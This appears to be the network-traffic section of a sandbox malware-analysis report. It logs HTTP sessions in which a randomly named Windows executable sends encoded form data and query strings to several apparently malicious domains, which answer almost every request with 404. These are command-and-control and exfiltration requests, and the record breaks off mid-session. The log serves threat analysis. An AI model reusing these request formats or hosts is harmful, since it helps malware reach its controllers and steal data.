                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            16192.168.2.1249772209.74.77.107805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:37:14.911601067 CET515OUTGET /4ii9/?RZ=0nkpmZbx9Z4P2&BHptZ6F=DCK/bgCIPtpt2RJApr/S57a5c6dyUmc4/YRC2H7mEi+GV8MabGqvART7ZhzmedatEBHVT2HbXE2R9ehhzokwzGc74R/EcNhRi8s6fgxoYqpZFSK7yfL6tiw= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.happyjam.life
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Dec 6, 2024 17:37:16.122333050 CET548INHTTP/1.1 404 Not Found
                                                                            Date: Fri, 06 Dec 2024 16:37:15 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            17192.168.2.124978938.47.207.164805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:37:21.828545094 CET769OUTPOST /sa1b/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.t19yd.top
                                                                            Origin: http://www.t19yd.top
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 204
                                                                            Referer: http://www.t19yd.top/sa1b/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 61 61 76 70 57 66 2f 44 4d 74 6b 38 2b 69 6d 46 77 4b 70 48 6b 48 43 7a 52 71 37 53 4b 4f 4b 44 63 65 75 68 48 35 54 36 6f 6d 44 6d 35 35 67 6f 47 2b 59 37 56 56 38 33 51 57 42 62 35 6d 56 64 6d 79 2f 74 53 67 6f 62 58 78 43 6e 2b 73 35 62 46 50 5a 52 62 44 6f 6b 34 74 79 59 45 62 58 33 63 6e 55 51 5a 2f 4c 69 78 41 39 31 65 72 79 4b 6c 59 6b 73 62 76 49 41 38 74 5a 34 4f 4c 2b 6b 35 58 42 58 75 59 2b 62 4d 55 7a 59 35 65 4b 46 73 53 38 32 48 44 50 6f 6a 77 44 38 70 70 34 2f 6d 30 66 61 78 45 4f 53 2f 73 68 37 31 6c 4e 56 59 70 4a 30 35 6b 71 6b 6b 32 64 54 65 7a 48 42 51 77 3d 3d
                                                                            Data Ascii: BHptZ6F=aavpWf/DMtk8+imFwKpHkHCzRq7SKOKDceuhH5T6omDm55goG+Y7VV83QWBb5mVdmy/tSgobXxCn+s5bFPZRbDok4tyYEbX3cnUQZ/LixA91eryKlYksbvIA8tZ4OL+k5XBXuY+bMUzY5eKFsS82HDPojwD8pp4/m0faxEOS/sh71lNVYpJ05kqkk2dTezHBQw==
                                                                            Dec 6, 2024 17:37:23.345650911 CET302INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Fri, 06 Dec 2024 16:37:23 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 138
                                                                            Connection: close
                                                                            ETag: "6693de8b-8a"
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            18192.168.2.124979438.47.207.164805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:37:24.490030050 CET789OUTPOST /sa1b/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.t19yd.top
                                                                            Origin: http://www.t19yd.top
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 224
                                                                            Referer: http://www.t19yd.top/sa1b/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 61 61 76 70 57 66 2f 44 4d 74 6b 38 34 43 32 46 79 74 64 48 69 6e 43 77 66 4b 37 53 45 75 4b 48 63 65 53 68 48 37 2b 69 72 55 58 6d 35 59 77 6f 48 38 67 37 59 31 38 33 4a 6d 42 61 33 47 56 73 6d 79 7a 66 53 69 38 62 58 77 69 6e 2b 75 78 62 46 38 68 65 59 7a 6f 6d 7a 4e 79 57 4b 37 58 33 63 6e 55 51 5a 2f 76 49 78 42 56 31 5a 62 69 4b 6e 39 49 6a 53 50 49 50 6f 39 5a 34 4b 4c 2b 65 35 58 42 31 75 5a 69 39 4d 57 62 59 35 63 53 46 73 6e 49 33 4d 44 50 75 75 51 43 75 6e 38 41 78 68 58 48 4f 73 33 6e 79 68 76 64 4e 39 44 41 50 48 62 42 69 73 6e 2b 70 70 68 6b 6a 54 77 36 49 4c 30 65 35 6a 77 4b 35 6b 4e 31 30 71 56 6b 71 38 38 79 6d 68 68 34 3d
                                                                            Data Ascii: BHptZ6F=aavpWf/DMtk84C2FytdHinCwfK7SEuKHceShH7+irUXm5YwoH8g7Y183JmBa3GVsmyzfSi8bXwin+uxbF8heYzomzNyWK7X3cnUQZ/vIxBV1ZbiKn9IjSPIPo9Z4KL+e5XB1uZi9MWbY5cSFsnI3MDPuuQCun8AxhXHOs3nyhvdN9DAPHbBisn+pphkjTw6IL0e5jwK5kN10qVkq88ymhh4=
                                                                            Dec 6, 2024 17:37:26.010193110 CET302INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Fri, 06 Dec 2024 16:37:25 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 138
                                                                            Connection: close
                                                                            ETag: "6693de8b-8a"
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            19192.168.2.124980038.47.207.164805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:37:27.162319899 CET1802OUTPOST /sa1b/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.t19yd.top
                                                                            Origin: http://www.t19yd.top
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 1236
                                                                            Referer: http://www.t19yd.top/sa1b/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 61 61 76 70 57 66 2f 44 4d 74 6b 38 34 43 32 46 79 74 64 48 69 6e 43 77 66 4b 37 53 45 75 4b 48 63 65 53 68 48 37 2b 69 72 55 50 6d 34 71 6f 6f 49 39 67 37 5a 31 38 33 42 47 42 66 33 47 56 4c 6d 79 36 57 53 69 68 6d 58 30 53 6e 2f 4c 39 62 4f 74 68 65 50 6a 6f 6d 38 74 79 58 45 62 58 69 63 6a 34 55 5a 2f 66 49 78 42 56 31 5a 5a 71 4b 75 49 6b 6a 55 50 49 41 38 74 59 33 4f 4c 2f 78 35 57 6b 58 75 5a 6d 4c 50 6d 37 59 35 38 43 46 38 42 55 33 42 44 50 73 67 77 44 72 6e 38 46 7a 68 55 6a 34 73 32 53 6c 68 6f 78 4e 35 32 68 70 58 4b 6b 38 77 52 36 5a 37 53 6b 52 57 67 69 58 45 56 69 73 73 53 32 46 70 59 78 44 74 48 6c 30 35 5a 2b 41 7a 78 63 38 79 35 32 34 51 70 4c 6e 78 2b 59 61 6d 31 31 39 74 58 7a 34 42 58 32 50 54 4f 49 50 51 41 69 65 73 76 50 51 72 59 6c 62 64 36 48 36 75 43 7a 58 6d 34 57 41 65 47 48 54 70 4c 6f 5a 70 31 6d 36 4a 50 35 78 77 61 4d 6f 59 77 30 34 57 58 64 57 67 78 42 50 34 62 53 61 6e 79 46 52 46 48 6a 76 42 6e 45 64 55 4e 6b 6d 31 4a 2b 63 6a 51 4b 64 59 70 [TRUNCATED]
                                                                            Data Ascii: BHptZ6F=aavpWf/DMtk84C2FytdHinCwfK7SEuKHceShH7+irUPm4qooI9g7Z183BGBf3GVLmy6WSihmX0Sn/L9bOthePjom8tyXEbXicj4UZ/fIxBV1ZZqKuIkjUPIA8tY3OL/x5WkXuZmLPm7Y58CF8BU3BDPsgwDrn8FzhUj4s2SlhoxN52hpXKk8wR6Z7SkRWgiXEVissS2FpYxDtHl05Z+Azxc8y524QpLnx+Yam119tXz4BX2PTOIPQAiesvPQrYlbd6H6uCzXm4WAeGHTpLoZp1m6JP5xwaMoYw04WXdWgxBP4bSanyFRFHjvBnEdUNkm1J+cjQKdYplvotbBKiXa2xDtZZb2yP6GFoYG70VAU1d7oj/XqOtyaLKfbmP17JAJmE3IcJmHxnR83JxCkZiWB+gcA7b9maQSXAc5T1WLNmlYAokznNeEXUcu8GgaPgTmRPnJ+05jKnv/0UB/yvBfS8PJaxQ0iRvgd0qe7P73t5XL+e2lCwbadfg/8ipV4iPWl7hpnIHD183vQoKYdi3JQUZB3NKOo72GQoN3+sJx4A3M+onXtSjEHXa7/89YV0k1jyYSTUqiVe08JWbJ2j6niIoE1m7ihwEksvJunmnIaajxXIII39e1WiDhfztag/HDDy+gzMLiUsh14PbkLPKLFN0uma95FSE82ZdEde+p3g8g4uB7DGXdd4lWfytyiXB2pPN64N0z9bXeSH+v8KEjWeOL7Gwz2CeQf+jzHLEK64rTLCUQxAC1ERHdlYfSr+RrpWN2z9O84lffIieVLMegB2bx8vauDVNF1OHRMVeB4Fc8yDr6a3VzXpY4s6db92896U90smR1s8P0n9PCrEZDlw3RLO6OqjEJMy7dQx4nP9bsDmxY1M0W8FspE425mzxJBM7XQVwItsC88HLige8ausk1r36skzySl+PZdBY+23JNjgKNR2Q1vVSHKyflv1u1zJ+G65qoI/lLl6WBMIxkeW3gahEJ50W2hR7/SoZvpc7V [TRUNCATED]
                                                                            Dec 6, 2024 17:37:28.696182013 CET302INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Fri, 06 Dec 2024 16:37:28 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 138
                                                                            Connection: close
                                                                            ETag: "6693de8b-8a"
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            20192.168.2.124980938.47.207.164805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:37:29.829133987 CET511OUTGET /sa1b/?BHptZ6F=XYHJVoT0LuIOm26Tyq9N91avW6u0HKWTSvSmIrnltmLk6JYzFfgCVHRXJm9nnHtkqw/GQg9hdUic1chKWcYHIwgC/tmXBuLbW2sUc5PcpWY1XILnhN44V5I=&RZ=0nkpmZbx9Z4P2 HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.t19yd.top
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Dec 6, 2024 17:37:31.396498919 CET302INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Fri, 06 Dec 2024 16:37:31 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 138
                                                                            Connection: close
                                                                            ETag: "6693de8b-8a"
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            21192.168.2.1249827208.115.225.220805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:37:37.583045006 CET790OUTPOST /gua3/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.atendefacil.info
                                                                            Origin: http://www.atendefacil.info
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 204
                                                                            Referer: http://www.atendefacil.info/gua3/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 43 47 73 52 51 5a 44 31 63 32 4c 54 54 35 68 65 6c 77 53 53 53 53 53 77 6d 2b 35 5a 62 55 4f 66 45 58 69 56 74 42 55 55 5a 4a 69 6f 6d 6f 74 6a 69 69 52 61 30 32 4b 6e 48 7a 49 35 33 55 74 66 50 6d 69 4b 69 65 53 67 65 52 69 78 46 33 39 53 57 64 6b 38 72 31 6e 70 46 33 47 36 6d 72 6c 64 4d 4b 37 72 4a 66 4d 74 55 44 37 59 48 48 61 2f 70 61 7a 34 6e 68 2f 2b 6c 4f 57 2b 33 63 69 42 79 65 78 37 6f 39 33 48 47 4b 53 4b 41 4a 4f 7a 68 58 43 75 6c 6a 45 7a 49 63 77 54 46 64 35 46 47 73 63 78 4d 50 62 48 55 49 53 57 35 4e 58 34 46 47 70 48 4b 67 34 43 2b 55 61 43 52 53 72 33 78 77 3d 3d
                                                                            Data Ascii: BHptZ6F=CGsRQZD1c2LTT5helwSSSSSwm+5ZbUOfEXiVtBUUZJiomotjiiRa02KnHzI53UtfPmiKieSgeRixF39SWdk8r1npF3G6mrldMK7rJfMtUD7YHHa/paz4nh/+lOW+3ciByex7o93HGKSKAJOzhXCuljEzIcwTFd5FGscxMPbHUISW5NX4FGpHKg4C+UaCRSr3xw==
                                                                            Dec 6, 2024 17:37:38.720045090 CET481INHTTP/1.1 404 Not Found
                                                                            Date: Fri, 06 Dec 2024 16:37:38 GMT
                                                                            Server: Apache/2
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            22192.168.2.1249833208.115.225.220805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:37:40.258650064 CET810OUTPOST /gua3/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.atendefacil.info
                                                                            Origin: http://www.atendefacil.info
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 224
                                                                            Referer: http://www.atendefacil.info/gua3/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 43 47 73 52 51 5a 44 31 63 32 4c 54 53 59 52 65 70 7a 36 53 5a 53 53 76 73 65 35 5a 42 6b 4f 62 45 58 75 56 74 46 4e 5a 5a 66 79 6f 6e 4c 35 6a 6a 6a 52 61 7a 32 4b 6e 50 54 49 38 7a 55 74 71 50 6d 6e 33 69 65 75 67 65 52 32 78 46 30 70 53 58 75 63 2f 78 46 6e 72 4f 58 47 43 37 62 6c 64 4d 4b 37 72 4a 66 5a 47 55 43 54 59 48 58 71 2f 6f 37 7a 33 37 78 2f 2f 7a 2b 57 2b 7a 63 6a 70 79 65 77 63 6f 2f 43 63 47 4d 65 4b 41 49 2b 7a 67 43 75 74 73 6a 45 31 57 73 78 59 42 65 67 4c 65 63 42 2b 50 5a 6e 61 56 63 69 71 38 4c 61 69 61 30 68 52 66 6a 73 50 7a 44 6a 79 63 52 57 2b 71 35 37 39 6e 59 6a 34 48 5a 2f 69 36 65 35 43 38 56 4b 4a 67 5a 4d 3d
                                                                            Data Ascii: BHptZ6F=CGsRQZD1c2LTSYRepz6SZSSvse5ZBkObEXuVtFNZZfyonL5jjjRaz2KnPTI8zUtqPmn3ieugeR2xF0pSXuc/xFnrOXGC7bldMK7rJfZGUCTYHXq/o7z37x//z+W+zcjpyewco/CcGMeKAI+zgCutsjE1WsxYBegLecB+PZnaVciq8Laia0hRfjsPzDjycRW+q579nYj4HZ/i6e5C8VKJgZM=
                                                                            Dec 6, 2024 17:37:41.387670040 CET481INHTTP/1.1 404 Not Found
                                                                            Date: Fri, 06 Dec 2024 16:37:41 GMT
                                                                            Server: Apache/2
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            23192.168.2.1249843208.115.225.220805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:37:42.931548119 CET1823OUTPOST /gua3/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.atendefacil.info
                                                                            Origin: http://www.atendefacil.info
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 1236
                                                                            Referer: http://www.atendefacil.info/gua3/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
